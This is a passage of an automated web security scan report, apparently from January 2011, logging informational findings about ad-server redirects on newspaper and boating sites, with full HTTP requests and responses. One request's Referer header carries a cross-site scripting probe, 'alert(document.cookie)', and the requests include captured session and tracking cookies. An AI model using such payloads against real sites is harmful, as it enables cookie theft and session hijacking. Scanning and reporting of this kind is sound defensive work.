<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

17.217. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

17.218. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/328960883/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/328960883/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/328960883/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

17.219. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/572126538/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/572126538/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/572126538/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

17.220. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

17.221. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

17.222. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

17.223. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/788685001/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/788685001/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/788685001/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

17.224. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/90261661/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/90261661/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/90261661/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

17.225. http://oascentral.bostonherald.com/RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3? HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://boston30.autochooser.com/results.asp?6bfd0%3balert(document.cookie)//cb19586ae74=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:24:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1639
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_w
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/www.carfind.com/L15/1983280564/Right2/BostonHerald/HerbChambers_120x90/herbChambers120x90.gif/72634857383031444f386b4144567663?x" target="new"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/HerbChambers_120x90/herbChambers120x90.gif" ALT="" BORDER="0"></A>
...[SNIP]...
//oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/www.carfind.com/L15/249001598/Right3/BostonHerald/Quirk_Carfind_120x100_F2/carfind-tiny-ad.gif/72634857383031444f386b4144567663?x" target="new"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/Quirk_Carfind_120x100_F2/carfind-tiny-ad.gif" ALT="" BORDER="0"></A>
...[SNIP]...
://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/www.carfind.com/L15/683665909/Top1/BostonHerald/Quirk_Carfind_468x60_F2/quirk468x60_Jan07.gif/72634857383031444f386b4144567663?x" target="new"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/Quirk_Carfind_468x60_F2/quirk468x60_Jan07.gif" ALT="" BORDER="0"></A>
...[SNIP]...

17.226. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/1304732975/Position1/BostonHerald/JobfindFeatured/MJMConstructionCorp.html/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/1304732975/Position1/BostonHerald/JobfindFeatured/MJMConstructionCorp.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/1304732975/Position1/BostonHerald/JobfindFeatured/MJMConstructionCorp.html/72634857383031444f386b4144567663?1304732975 HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://hotjobs.yahoo.com/careers-912465-MJM_Construction
Content-Length: 334
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hotjobs.yahoo.com/careers-912465-MJM_Construction">here</a>
...[SNIP]...

17.227. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/2007038988/x15/BostonHerald/HerbChambers_234x60/herbChambers234x60a.gif/72634857383031444f386741434e6f35

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/2007038988/x15/BostonHerald/HerbChambers_234x60/herbChambers234x60a.gif/72634857383031444f386741434e6f35

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/2007038988/x15/BostonHerald/HerbChambers_234x60/herbChambers234x60a.gif/72634857383031444f386741434e6f35?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.herbchambers.com
Content-Length: 305
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.herbchambers.com">here</a>.</p>
<hr>
...[SNIP]...

17.228. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/49256996/x16/BostonHerald/BooCoo_234x60/boocoo_BlueWhite_234x60.jpg/72634857383031444f386741434e6f35

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/49256996/x16/BostonHerald/BooCoo_234x60/boocoo_BlueWhite_234x60.jpg/72634857383031444f386741434e6f35

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/49256996/x16/BostonHerald/BooCoo_234x60/boocoo_BlueWhite_234x60.jpg/72634857383031444f386741434e6f35?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://bostonherald.boocoo.com/
Content-Length: 309
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://bostonherald.boocoo.com/">here</a>.</p>

...[SNIP]...

17.229. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/855079761/Position2/BostonHerald/JobfindFeatured/EverettNursing.html/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/855079761/Position2/BostonHerald/JobfindFeatured/EverettNursing.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/855079761/Position2/BostonHerald/JobfindFeatured/EverettNursing.html/72634857383031444f386b4144567663?855079761 HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://hotjobs.yahoo.com/careers-651789-Everett_Nursing_and_Rehabilitation_Center
Content-Length: 359
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hotjobs.yahoo.com/careers-651789-Everett_Nursing_and_Rehabilitation_Center">here</a>
...[SNIP]...

17.230. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561?
Content-Length: 600
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
